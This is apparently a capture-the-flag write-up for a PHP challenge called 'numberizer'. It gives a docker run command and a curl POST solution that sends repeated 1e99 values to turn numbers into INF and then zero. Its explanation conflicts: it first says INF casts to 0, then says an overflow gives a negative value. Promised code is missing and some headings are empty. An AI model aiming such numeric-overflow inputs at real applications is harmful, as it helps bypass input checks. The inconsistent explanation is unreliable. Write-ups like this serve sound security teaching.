image.png

Do you want to run this Docker container locally?

 docker run -d --name numberizer --restart unless-stopped -p 9007:80 joshbeck2024/numberizer:latest

Short Summary

Key idea (short version)

1e99 becomes infinity (INF) in PHP.

When INF is converted to an integer, PHP turns it into 0.

What’s happening:

Solution:

curl -X POST '<http://sem2ctf.icsi.cyber:9007/>' -d 'numbers[]=1e99&numbers[]=1e99&numbers[]=1e99&numbers[]=1e99&numbers[]=1e99'

Supplying an extremely large number will cause an integer overflow, resulting in a negative value.

Here is the application code with concise comments: